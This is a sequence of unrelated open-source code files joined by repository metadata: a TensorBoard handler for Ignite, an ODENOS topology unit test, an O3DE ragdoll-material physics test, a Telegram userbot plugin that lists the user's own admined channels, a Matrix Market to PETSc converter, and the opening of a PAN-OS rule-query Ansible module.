It's can be used for any Ignite Engine(trainer, validator and evaluator).
And it can support both epoch level and iteration level with pre-defined TensorBoard event writer.
The expected data source is Ignite ``engine.state.output`` and ``engine.state.metrics``.
Default behaviors:
- When EPOCH_COMPLETED, write each dictionary item in
``engine.state.metrics`` to TensorBoard.
- When ITERATION_COMPLETED, write each dictionary item in
``self.output_transform(engine.state.output)`` to TensorBoard.
"""
def __init__(
self,
summary_writer: Optional[SummaryWriter] = None,
log_dir: str = "./runs",
epoch_event_writer: Optional[Callable[[Engine, SummaryWriter], Any]] = None,
iteration_event_writer: Optional[Callable[[Engine, SummaryWriter], Any]] = None,
output_transform: Callable = lambda x: x,
global_epoch_transform: Callable = lambda x: x,
tag_name: str = DEFAULT_TAG,
) -> None:
"""
Args:
summary_writer: user can specify TensorBoard SummaryWriter,
default to create a new writer.
log_dir: if using default SummaryWriter, write logs to this directory, default is `./runs`.
epoch_event_writer: customized callable TensorBoard writer for epoch level.
Must accept parameter "engine" and "summary_writer", use default event writer if None.
iteration_event_writer: customized callable TensorBoard writer for iteration level.
Must accept parameter "engine" and "summary_writer", use default event writer if None.
output_transform: a callable that is used to transform the
``ignite.engine.output`` into a scalar to plot, or a dictionary of {key: scalar}.
In the latter case, the output string will be formatted as key: value.
By default this value plotting happens when every iteration completed.
global_epoch_transform: a callable that is used to customize global epoch number.
For example, in evaluation, the evaluator engine might want to use trainer engines epoch number
when plotting epoch vs metric curves.
tag_name: when iteration output is a scalar, tag_name is used to plot, defaults to ``'Loss'``.
"""
self._writer = SummaryWriter(log_dir=log_dir) if summary_writer is None else summary_writer
self.epoch_event_writer = epoch_event_writer
self.iteration_event_writer = iteration_event_writer
self.output_transform = output_transform
self.global_epoch_transform = global_epoch_transform
self.tag_name = tag_name
def attach(self, engine: Engine) -> None:
"""
Register a set of Ignite Event-Handlers to a specified Ignite engine.
Args:
engine: Ignite Engine, it can be a trainer, validator or evaluator.
"""
if not engine.has_event_handler(self.iteration_completed, Events.ITERATION_COMPLETED):
engine.add_event_handler(Events.ITERATION_COMPLETED, self.iteration_completed)
if not engine.has_event_handler(self.epoch_completed, Events.EPOCH_COMPLETED):
engine.add_event_handler(Events.EPOCH_COMPLETED, self.epoch_completed)
def epoch_completed(self, engine: Engine) -> None:
    """Handle an epoch-completed event.

    Dispatches to the user-supplied epoch writer when one was configured,
    otherwise falls back to the default writer (which plots
    ``engine.state.metrics``).

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
    """
    write_epoch = (
        self._default_epoch_writer
        if self.epoch_event_writer is None
        else self.epoch_event_writer
    )
    write_epoch(engine, self._writer)
def iteration_completed(self, engine: Engine) -> None:
    """Handle an iteration-completed event.

    Dispatches to the user-supplied iteration writer when one was
    configured, otherwise falls back to the default writer (which plots
    the transformed ``engine.state.output``).

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
    """
    write_iteration = (
        self._default_iteration_writer
        if self.iteration_event_writer is None
        else self.iteration_event_writer
    )
    write_iteration(engine, self._writer)
def _default_epoch_writer(self, engine: Engine, writer: SummaryWriter) -> None:
    """Write every entry of ``engine.state.metrics`` as a TensorBoard scalar.

    The x-axis value is the (possibly transformed) epoch number, so an
    evaluator can plot against its trainer's epoch via
    ``global_epoch_transform``.

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
        writer: TensorBoard writer, created in TensorBoardHandler.
    """
    epoch = self.global_epoch_transform(engine.state.epoch)
    for metric_name, metric_value in engine.state.metrics.items():
        writer.add_scalar(metric_name, metric_value, epoch)
    writer.flush()
def _default_iteration_writer(self, engine: Engine, writer: SummaryWriter) -> None:
    """Write the current iteration's (transformed) output as scalar(s).

    A dict output is plotted key-by-key (keys sorted); a plain scalar is
    plotted under ``self.tag_name``. Non-scalar values are skipped with a
    warning; a ``None`` output skips the iteration entirely.

    Args:
        engine: Ignite Engine, it can be a trainer, validator or evaluator.
        writer: TensorBoard writer, created in TensorBoardHandler.
    """
    output = self.output_transform(engine.state.output)
    if output is None:
        return  # do nothing if output is empty
    step = engine.state.iteration

    def _as_number(val):
        # torch tensors must be unwrapped to a python number for add_scalar
        return val.item() if isinstance(val, torch.Tensor) else val

    if isinstance(output, dict):
        for name in sorted(output):
            value = output[name]
            if is_scalar(value):
                writer.add_scalar(name, _as_number(value), step)
            else:
                # not plotting multi-dimensional output
                warnings.warn(
                    "ignoring non-scalar output in TensorBoardStatsHandler,"
                    " make sure `output_transform(engine.state.output)` returns"
                    " a scalar or dictionary of key and scalar pairs to avoid this warning."
                    " {}:{}".format(name, type(value))
                )
    elif is_scalar(output):  # not printing multi dimensional output
        writer.add_scalar(self.tag_name, _as_number(output), step)
    else:
        warnings.warn(
            "ignoring non-scalar output in TensorBoardStatsHandler,"
            " make sure `output_transform(engine.state.output)` returns"
            " a scalar or a dictionary of key and scalar pairs to avoid this warning."
            " {}".format(type(output))
        )
    writer.flush()
class TensorBoardImageHandler:
    """
    TensorBoardImageHandler is an Ignite Event handler that can visualize images, labels and outputs as 2D/3D images.
    2D output (shape in Batch, channel, H, W) will be shown as simple image using the first element in the batch,
    for 3D to ND output (shape in Batch, channel, H, W, D) input, each of ``self.max_channels`` number of images'
    last three dimensions will be shown as animated GIF along the last axis (typically Depth).
    It can be used for any Ignite Engine (trainer, validator and evaluator).
    User can easily add it to engine for any expected Event, for example: ``EPOCH_COMPLETED``,
    ``ITERATION_COMPLETED``. The expected data source is ignite's ``engine.state.batch`` and ``engine.state.output``.
    Default behavior:
        - Show y_pred as images (GIF for 3D) on TensorBoard when Event triggered,
        - Need to use ``batch_transform`` and ``output_transform`` to specify
          how many images to show and show which channel.
        - Expects ``batch_transform(engine.state.batch)`` to return data
          format: (image[N, channel, ...], label[N, channel, ...]).
        - Expects ``output_transform(engine.state.output)`` to return a torch
          tensor in format (y_pred[N, channel, ...], loss).
    """

    def __init__(
        self,
        summary_writer: Optional[SummaryWriter] = None,
        log_dir: str = "./runs",
        interval: int = 1,
        epoch_level: bool = True,
        batch_transform: Callable = lambda x: x,
        output_transform: Callable = lambda x: x,
        global_iter_transform: Callable = lambda x: x,
        index: int = 0,
        max_channels: int = 1,
        max_frames: int = 64,
    ) -> None:
        """
        Args:
            summary_writer: user can specify TensorBoard SummaryWriter,
                default to create a new writer.
            log_dir: if using default SummaryWriter, write logs to this directory, default is `./runs`.
            interval: plot content from engine.state every N epochs or every N iterations, default is 1.
            epoch_level: plot content from engine.state every N epochs or N iterations. `True` is epoch level,
                `False` is iteration level.
            batch_transform: a callable that is used to transform the
                ``ignite.engine.batch`` into expected format to extract several label data.
            output_transform: a callable that is used to transform the
                ``ignite.engine.output`` into expected format to extract several output data.
            global_iter_transform: a callable that is used to customize global step number for TensorBoard.
                For example, in evaluation, the evaluator engine needs to know current epoch from trainer.
            index: plot which element in a data batch, default is the first element.
            max_channels: number of channels to plot.
            max_frames: number of frames for 2D-t plot.
        """
        self._writer = SummaryWriter(log_dir=log_dir) if summary_writer is None else summary_writer
        self.interval = interval
        self.epoch_level = epoch_level
        self.batch_transform = batch_transform
        self.output_transform = output_transform
        self.global_iter_transform = global_iter_transform
        self.index = index
        self.max_frames = max_frames
        self.max_channels = max_channels

    def attach(self, engine: Engine) -> None:
        """Register this handler on *engine* at the configured interval.

        Args:
            engine: Ignite Engine, it can be a trainer, validator or evaluator.
        """
        if self.epoch_level:
            engine.add_event_handler(Events.EPOCH_COMPLETED(every=self.interval), self)
        else:
            engine.add_event_handler(Events.ITERATION_COMPLETED(every=self.interval), self)

    def __call__(self, engine: Engine) -> None:
        """Plot the current batch's images/labels and the engine output.

        Args:
            engine: Ignite Engine, it can be a trainer, validator or evaluator.
        Raises:
            TypeError: When ``batch_transform(engine.state.batch)[0]`` type is not in
                ``Optional[Union[numpy.ndarray, torch.Tensor]]``.
            TypeError: When ``batch_transform(engine.state.batch)[1]`` type is not in
                ``Optional[Union[numpy.ndarray, torch.Tensor]]``.
            TypeError: When ``output_transform(engine.state.output)`` type is not in
                ``Optional[Union[numpy.ndarray, torch.Tensor]]``.
        """
        step = self.global_iter_transform(engine.state.epoch if self.epoch_level else engine.state.iteration)
        # All three data sources go through the same validate-and-plot path;
        # the first string in each call is used in the TypeError message so
        # the user can tell which transform produced the bad value.
        self._validate_and_plot(
            "batch_transform(engine.state.batch)[0]", self.batch_transform(engine.state.batch)[0], step, "input_0"
        )
        self._validate_and_plot(
            "batch_transform(engine.state.batch)[1]", self.batch_transform(engine.state.batch)[1], step, "input_1"
        )
        self._validate_and_plot(
            "output_transform(engine.state.output)", self.output_transform(engine.state.output), step, "output"
        )
        self._writer.flush()

    def _validate_and_plot(self, source_desc: str, data, step: int, tag: str) -> None:
        """Convert *data* to a numpy array and plot it under *tag*.

        ``None`` is silently skipped; anything that is not a numpy array or
        torch tensor raises TypeError naming *source_desc*.
        """
        if isinstance(data, torch.Tensor):
            data = data.detach().cpu().numpy()
        if data is None:
            return
        if not isinstance(data, np.ndarray):
            # NOTE: the message previously blamed output_transform for the
            # batch_transform images; source_desc now names the real source.
            raise TypeError(
                f"{source_desc} must be None or one of "
                f"(numpy.ndarray, torch.Tensor) but is {type(data).__name__}."
            )
        plot_2d_or_3d_image(data, step, self._writer, self.index, self.max_channels, self.max_frames, tag)
| 48.413681 | 117 | 0.650205 |
acdfb89d08e26530a8faea5408455fb9a2a139c1 | 5,549 | py | Python | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 26 | 2015-02-18T10:22:50.000Z | 2020-06-18T05:07:54.000Z | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 45 | 2015-02-20T00:40:45.000Z | 2021-12-14T21:07:57.000Z | src/test/python/org/o3project/odenos/core/component/network/topology/test_topology_changed.py | o3project/odenos | 837d0d3d3c37482e843c40c5eeeac10646e68c65 | [
"Apache-2.0"
] | 30 | 2015-02-19T02:00:35.000Z | 2017-02-18T15:28:09.000Z | # -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
import unittest
from org.o3project.odenos.core.component.network.topology.node import Node
from org.o3project.odenos.core.component.network.topology.link import Link
from org.o3project.odenos.core.component.network.topology.topology import Topology
from org.o3project.odenos.core.component.network.topology.topology_changed\
import TopologyChanged
class TopologyChangedTest(unittest.TestCase):
    """Tests for TopologyChanged construction, accessors and unpacking."""

    def setUp(self):
        # Two single-node topologies joined by opposite-direction links; the
        # event under test records the transition from the first to the second.
        forward_link = Link('Link', '1', 'LinkId1', 'NodeId1',
                            'PortId1', 'NodeId2', 'PortId3', {})
        backward_link = Link('Link', '1', 'LinkId2', 'NodeId2',
                             'PortId4', 'NodeId1', 'PortId2', {})
        first_node = Node('Node', '1', 'NodeId1', {}, {})
        second_node = Node('Node', '1', 'NodeId2', {}, {})
        previous = Topology('Topology', 'version',
                            {'NodeId1': first_node}, {'LinkId1': forward_link})
        current = Topology('Topology', 'version',
                           {'NodeId2': second_node}, {'LinkId2': backward_link})
        self.target = TopologyChanged('1', previous, current)

    def tearDown(self):
        pass

    def test_constructor(self):
        # The constructor stores its arguments in name-mangled private fields.
        stored_prev = self.target._TopologyChanged__prev
        stored_curr = self.target._TopologyChanged__curr
        self.assertEqual(self.target._TopologyChanged__version, '1')
        self.assertEqual(stored_prev.nodes['NodeId1'].node_id, 'NodeId1')
        self.assertEqual(stored_curr.nodes['NodeId2'].node_id, 'NodeId2')
        self.assertEqual(stored_prev.links['LinkId1'].link_id, 'LinkId1')
        self.assertEqual(stored_curr.links['LinkId2'].link_id, 'LinkId2')

    def test_version(self):
        self.assertEqual(self.target.version, '1')

    def test_prev(self):
        previous = self.target.prev
        self.assertEqual(previous.nodes['NodeId1'].node_id, 'NodeId1')
        self.assertEqual(previous.links['LinkId1'].link_id, 'LinkId1')

    def test_curr(self):
        current = self.target.curr
        self.assertEqual(current.nodes['NodeId2'].node_id, 'NodeId2')
        self.assertEqual(current.links['LinkId2'].link_id, 'LinkId2')

    def test_create_from_packed(self):
        # Packed (dict) forms of the four topology elements.
        node1_packed = {'type': 'Node', 'version': '1', 'node_id': 'NodeId1',
                        'ports': {}, 'attributes': {}}
        node2_packed = {'type': 'Node', 'version': '1', 'node_id': 'NodeId2',
                        'ports': {}, 'attributes': {}}
        link1_packed = {'type': 'Link', 'version': '1', 'link_id': 'LinkId1',
                        'src_node': 'NodeId1', 'src_port': 'PortId1',
                        'dst_node': 'NodeId2', 'dst_port': 'PortId3',
                        'attributes': {}}
        link2_packed = {'type': 'Link', 'version': '1', 'link_id': 'LinkId2',
                        'src_node': 'NodeId2', 'src_port': 'PortId4',
                        'dst_node': 'NodeId1', 'dst_port': 'PortId2',
                        'attributes': {}}
        packed = {'version': '1',
                  'prev': {'type': 'Topology', 'version': '1',
                           'nodes': {'NodeId1': node1_packed},
                           'links': {'LinkId1': link1_packed}},
                  'curr': {'type': 'Topology', 'version': '1',
                           'nodes': {'NodeId2': node2_packed},
                           'links': {'LinkId2': link2_packed}}}
        result = TopologyChanged.create_from_packed(packed)
        self.assertEqual(result.version, '1')
        self.assertEqual(result.prev.nodes['NodeId1'].node_id, 'NodeId1')
        self.assertEqual(result.curr.nodes['NodeId2'].node_id, 'NodeId2')
        self.assertEqual(result.prev.links['LinkId1'].link_id, 'LinkId1')
        self.assertEqual(result.curr.links['LinkId2'].link_id, 'LinkId2')
# Allow running this test module directly (python test_topology_changed.py).
if __name__ == "__main__":
    unittest.main()
| 51.37963 | 82 | 0.448549 |
acdfb8beff100dd0aa1e4531f37a3a46972041c0 | 183 | py | Python | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | 2 | 2022-01-19T02:33:11.000Z | 2022-01-19T02:33:13.000Z | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | Python/3-DevOps/week3/django_testing/app/tutorials/tests.py | armirh/Nucamp-SQL-Devops-Training | 6c2dc5793c732bfb4c4d365acbb346a95fbf4bf2 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.urls import reverse
import pytest
# Create your tests here.
def test_homepage_access():
    """The URL pattern named 'home' must resolve to the site root path."""
    assert reverse('home') == "/"
| 18.3 | 32 | 0.721311 |
acdfb98411771b7297029a6959a2f18e33ebd032 | 11,268 | py | Python | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | 1 | 2022-03-12T14:13:45.000Z | 2022-03-12T14:13:45.000Z | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | 2 | 2022-01-13T04:29:38.000Z | 2022-03-12T01:05:31.000Z | AutomatedTesting/Gem/PythonTests/physics/C4925582_Material_AddModifyDeleteOnRagdollBones.py | cypherdotXd/o3de | bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676 | [
"Apache-2.0",
"MIT"
] | null | null | null | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
# Test Case ID : C4925582
# Test Case Title : Check that any change (Add/Delete/Modify) made to the material surface in the material library reflects immediately in the ragdoll bones
# fmt: off
class Tests:
    # Each attribute is a (pass_message, fail_message) tuple consumed by
    # Report.result(); the _0/_1/_2 suffix maps to the three game-mode passes
    # (0 = baseline, 1 = after modifying restitution, 2 = after deleting the
    # material).
    enter_game_mode_0 = ("Test 0) Entered game mode", "Test 0) Failed to enter game mode")
    find_terrain_0 = ("Test 0) The Terrain was found", "Test 0) The Terrain was not found")
    find_default_ragdoll_0 = ("Test 0) Default ragdoll was found", "Test 0) Default ragdoll was not found")
    find_modified_ragdoll_0 = ("Test 0) Modified ragdoll was found", "Test 0) Modified ragdoll was not found")
    default_ragdoll_bounced_0 = ("Test 0) Default ragdoll bounced", "Test 0) Default ragdoll did not bounce")
    modified_ragdoll_bounced_0 = ("Test 0) Modified ragdoll bounced", "Test 0) Modified ragdoll did not bounce")
    exit_game_mode_0 = ("Test 0) Exited game mode", "Test 0) Failed to exit game mode")
    modified_less_than_default = ("Test 0) Modified ragdoll's bounce height was shorter than default", "Test 0) Modified ragdoll's bounce height was greater than default")
    enter_game_mode_1 = ("Test 1) Entered game mode", "Test 1) Failed to enter game mode")
    find_terrain_1 = ("Test 1) The Terrain was found", "Test 1) The Terrain was not found")
    find_default_ragdoll_1 = ("Test 1) Default ragdoll was found", "Test 1) Default ragdoll was not found")
    find_modified_ragdoll_1 = ("Test 1) Modified ragdoll was found", "Test 1) Modified ragdoll was not found")
    default_ragdoll_bounced_1 = ("Test 1) Default ragdoll bounced", "Test 1) Default ragdoll did not bounce")
    modified_ragdoll_bounced_1 = ("Test 1) Modified ragdoll bounced", "Test 1) Modified ragdoll did not bounce")
    exit_game_mode_1 = ("Test 1) Exited game mode", "Test 1) Failed to exit game mode")
    modified_greater_than_default = ("Test 1) Modified ragdoll's bounce height was higher than default's", "Test 1) Modified ragdoll's bounce height was not higher than default's")
    enter_game_mode_2 = ("Test 2) Entered game mode", "Test 2) Failed to enter game mode")
    find_terrain_2 = ("Test 2) The Terrain was found", "Test 2) The Terrain was not found")
    find_default_ragdoll_2 = ("Test 2) Default ragdoll was found", "Test 2) Default ragdoll was not found")
    find_modified_ragdoll_2 = ("Test 2) Modified ragdoll was found", "Test 2) Modified ragdoll was not found")
    default_ragdoll_bounced_2 = ("Test 2) Default ragdoll bounced", "Test 2) Default ragdoll did not bounce")
    modified_ragdoll_bounced_2 = ("Test 2) Modified ragdoll bounced", "Test 2) Modified ragdoll did not bounce")
    exit_game_mode_2 = ("Test 2) Exited game mode", "Test 2) Failed to exit game mode")
    default_equals_modified = ("Test 2) Modified and default ragdoll's bounce height were equal", "Test 2) Modified and default ragdoll's bounce height were not equal")
# fmt: on
def C4925582_Material_AddModifyDeleteOnRagdollBones():
    """
    Summary:
    Runs an automated test to verify that any change (Add/Delete/Modify) made to the material surface in the material
    library reflects immediately in the ragdoll bones.
    Level Description:
    Two ragdolls ("default_ragdoll" and "modified_ragdoll") sit above a terrain. The ragdolls are identical, save for
    their physX material.
    The ragdoll "default_ragdoll" is assigned the default physx material.
    A new material library was created with 1 material, called "Modified", this is assigned to "modified_ragdoll":
        dynamic friction: 0.5
        static friction: 0.5
        restitution: 0.25
    Expected behavior:
    For every iteration this test measures the bounce height of each entity. The ragdolls save their traveled distances
    each iteration, to verify different behavior between each setup.
    First the test verifies the two entities are assigned differing materials, without changing anything. With a lower
    restitution value, 'modified' should bounce much lower than 'default'.
    Next, the test modifies the restitution value for 'modified' (from 0.25 to 0.75). 'modified' should bounce higher
    than it did in the previous test, and greater than default.
    Finally, we delete the 'modified' material entirely. 'modified_ragdoll' should then behave the same as
    'default_ragdoll', and bounce the same distance.
    Test Steps:
    1) Open level
    2) Collect basis values without modifying anything
        2.1) Enter game mode
        2.2) Find entities
        2.3) Wait for entities to bounce
        2.4) Exit game mode
    3) Modify the restitution value of 'modified'
        3.1 - 3.4) <same as above>
    4) Delete 'modified_ragdoll's material
        4.1 - 4.4) <same as above>
    5) Close editor
    Note:
    - This test file must be called from the Open 3D Engine Editor command terminal
    - Any passed and failed tests are written to the Editor.log file.
        Parsing the file or running a log_monitor are required to observe the test results.
    :return: None
    """
    import os
    import sys

    import ImportPathHelper as imports

    imports.init()

    import azlmbr.legacy.general as general
    import azlmbr.bus as bus
    import azlmbr.components
    import azlmbr.physics
    import azlmbr.math as lymath

    from Physmaterial_Editor import Physmaterial_Editor
    from editor_python_test_tools.utils import Report
    from editor_python_test_tools.utils import TestHelper as helper

    # Seconds to wait for both ragdolls to complete a bounce per test pass.
    TIMEOUT = 3.0
    # Max height delta (meters) for two bounces to be considered "equal".
    BOUNCE_TOLERANCE = 0.05

    class Ragdoll:
        """Tracks one ragdoll entity's collision state and bounce heights."""

        def __init__(self, name):
            self.name = name
            # One max-bounce-height entry per test pass, appended by run_test().
            self.bounces = []

        def find_and_reset(self):
            # Re-acquire the entity and clear per-pass state; entity ids are
            # only valid within a single game-mode session.
            self.hit_terrain_position = None
            self.hit_terrain = False
            self.max_bounce = 0.0
            self.reached_max_bounce = False
            self.id = general.find_game_entity(self.name)
            return self.id.IsValid()

        @property
        def position(self):
            # Current world-space position of the ragdoll's root.
            return azlmbr.components.TransformBus(bus.Event, "GetWorldTranslation", self.id)

    def get_test(test_name):
        # Look up a (pass, fail) tuple from the Tests class by attribute name.
        return Tests.__dict__[test_name]

    def run_test(test_number):
        """Run one game-mode pass and record each ragdoll's max bounce height."""
        # x.1) Enter game mode
        helper.enter_game_mode(get_test("enter_game_mode_{}".format(test_number)))
        # x.2) Find entities
        terrain_id = general.find_game_entity("terrain")
        Report.result(get_test("find_terrain_{}".format(test_number)), terrain_id.IsValid())
        Report.result(get_test("find_default_ragdoll_{}".format(test_number)), default_ragdoll.find_and_reset())
        Report.result(get_test("find_modified_ragdoll_{}".format(test_number)), modified_ragdoll.find_and_reset())

        def on_collision_enter(args):
            # Record where each ragdoll first touches the terrain so bounce
            # height can be measured relative to that point.
            entering = args[0]
            for ragdoll in ragdolls:
                if ragdoll.id.Equal(entering):
                    if not ragdoll.hit_terrain:
                        ragdoll.hit_terrain_position = ragdoll.position
                        ragdoll.hit_terrain = True

        handler = azlmbr.physics.CollisionNotificationBusHandler()
        handler.connect(terrain_id)
        handler.add_callback("OnCollisionBegin", on_collision_enter)

        def wait_for_bounce():
            # Track each ragdoll's height above its impact point; the apex is
            # reached once the height stops increasing after rising above 0.
            for ragdoll in ragdolls:
                if ragdoll.hit_terrain:
                    current_bounce_height = ragdoll.position.z - ragdoll.hit_terrain_position.z
                    if current_bounce_height >= ragdoll.max_bounce:
                        ragdoll.max_bounce = current_bounce_height
                    elif ragdoll.max_bounce > 0.0:
                        ragdoll.reached_max_bounce = True
            return default_ragdoll.reached_max_bounce and modified_ragdoll.reached_max_bounce

        # x.3) Wait for entities to bounce
        helper.wait_for_condition(wait_for_bounce, TIMEOUT)
        Report.result(get_test("default_ragdoll_bounced_{}".format(test_number)), default_ragdoll.reached_max_bounce)
        Report.result(get_test("modified_ragdoll_bounced_{}".format(test_number)), modified_ragdoll.reached_max_bounce)
        for ragdoll in ragdolls:
            ragdoll.bounces.append(ragdoll.max_bounce)
        # x.4) Exit game mode
        helper.exit_game_mode(get_test("exit_game_mode_{}".format(test_number)))

    # 1) Open level and enter game mode
    helper.init_idle()
    helper.open_level("Physics", "C4925582_Material_AddModifyDeleteOnRagdollBones")
    # Setup persisting entities
    default_ragdoll = Ragdoll("default")
    modified_ragdoll = Ragdoll("modified")
    ragdolls = [default_ragdoll, modified_ragdoll]
    # 2) Collect basis values without modifying anything
    run_test(0)
    Report.result(Tests.modified_less_than_default, default_ragdoll.bounces[0] > modified_ragdoll.bounces[0])
    # 3) Modify the restitution value of 'modified'
    material_editor = Physmaterial_Editor("ragdollbones.physmaterial")
    material_editor.modify_material("Modified", "Restitution", 0.75)
    material_editor.save_changes()
    run_test(1)
    # NOTE(review): compares modified's pass-1 bounce against default's pass-0
    # baseline — presumably intentional since default's material never changes,
    # but confirm that bounces[1] was not intended for default here.
    Report.result(Tests.modified_greater_than_default, default_ragdoll.bounces[0] < modified_ragdoll.bounces[1])
    # 4) Delete 'modified's material
    material_editor.delete_material("Modified")
    material_editor.save_changes()
    run_test(2)
    Report.result(
        Tests.default_equals_modified,
        lymath.Math_IsClose(default_ragdoll.bounces[2], modified_ragdoll.bounces[2], BOUNCE_TOLERANCE),
    )
    Report.info("Default hit terrain: " + str(default_ragdoll.hit_terrain))
    Report.info("Modified hit terrain: " + str(modified_ragdoll.hit_terrain))
    Report.info("Default max bounce: " + str(default_ragdoll.reached_max_bounce))
    Report.info("Modified max bouce: " + str(modified_ragdoll.reached_max_bounce))
    Report.info("Default max bounce: " + str(default_ragdoll.bounces[0]))
    Report.info("Modified max bouce: " + str(modified_ragdoll.bounces[0]))
# Entry point when invoked from the Open 3D Engine Editor command terminal.
if __name__ == "__main__":
    import ImportPathHelper as imports

    imports.init()
    from editor_python_test_tools.utils import Report

    Report.start_test(C4925582_Material_AddModifyDeleteOnRagdollBones)
acdfb9c883b65bd338c5e51bf960cb88491170ae | 469 | py | Python | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | userbot/plugins/list_reserved_IQ.py | TeleOniOn/TeleOniOn | 9d6c676267e3dd991952e2d7166fac646fe7f2fc | [
"Apache-2.0"
] | null | null | null | # For TeleOniOn
# (c) TeleOniOn
from telethon import events, functions, types
import asyncio
@borg.on(events.NewMessage(pattern=r"\-listmyusernames", outgoing=True))
async def _(event):
    """Edit the '-listmyusernames' message into a list of admined public channels."""
    if event.fwd_from:
        return
    admined = await borg(functions.channels.GetAdminedPublicChannelsRequest())
    lines = [f"- {chat.title} @{chat.username} \n" for chat in admined.chats]
    await event.edit("".join(lines))
| 27.588235 | 77 | 0.716418 |
acdfba2601ebed5085b91a59803059a77004a695 | 781 | py | Python | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 22 | 2020-08-14T19:14:13.000Z | 2022-02-05T20:14:59.000Z | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 8 | 2020-10-09T23:23:36.000Z | 2021-08-05T20:35:18.000Z | Benchmarks/petsc/ConvertMtxToPetsc.py | vishalbelsare/CombBLAS | 426f6be0b29831025cdcacc1f8f69e3520bfb0ff | [
"BSD-3-Clause-LBNL"
] | 8 | 2020-12-04T09:10:06.000Z | 2022-01-04T15:37:59.000Z | import os, sys, argparse, logging
from scipy.io import mmread
# change if you use a different dir
sys.path.append('/opt/cray/pe/petsc/3.11.2.0/real/GNU64/8.2/haswell/lib/petsc/bin')
import PetscBinaryIO
parser = argparse.ArgumentParser()
parser.add_argument('matrix')
parser.add_argument('-o', '--outfile')
args = parser.parse_args()

# logging setup
logging.basicConfig(stream=sys.stdout,
                    format='%(asctime)s ::: %(levelname)s ::: %(filename)s ::: '
                    '%(funcName)s ::: line %(lineno)d ::: %(message)s',
                    level=logging.INFO)

A = mmread(args.matrix)

# Default output name: the input path with .petsc in place of .mtx,
# unless -o/--outfile was given explicitly.
if args.outfile is not None:
    outfile = args.outfile
else:
    outfile = args.matrix.replace('.mtx', '.petsc')

# PETSc binary files contain raw bytes, so the handle must be opened in
# binary mode (text mode 'w' fails under Python 3); the with-block also
# guarantees the file is flushed and closed (the old code leaked the handle).
with open(outfile, 'wb') as fh:
    PetscBinaryIO.PetscBinaryIO().writeMatSciPy(fh, A)
| 28.925926 | 83 | 0.65557 |
acdfbba4c306ef4570297869478794900cd8e660 | 18,707 | py | Python | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | 1 | 2019-04-19T23:08:27.000Z | 2019-04-19T23:08:27.000Z | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | null | null | null | library/panos_query_rules.py | rtodto/ansible-pan | b38bfec1883b456a4188112605d24e0e170134f7 | [
"Apache-2.0"
] | 2 | 2019-01-31T02:51:08.000Z | 2020-09-03T15:45:52.000Z | #!/usr/bin/env python
# Copyright 2017 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_query_rules
short_description: PANOS module that allows search for security rules in PANW NGFW devices.
description: >
- Security policies allow you to enforce rules and take action, and can be as general or specific as needed. The
policy rules are compared against the incoming traffic in sequence, and because the first rule that matches the
traffic is applied, the more specific rules must precede the more general ones.
author: "Bob Hagen (@rnh556)"
version_added: "2.5"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.python.org/pypi/pan-python)
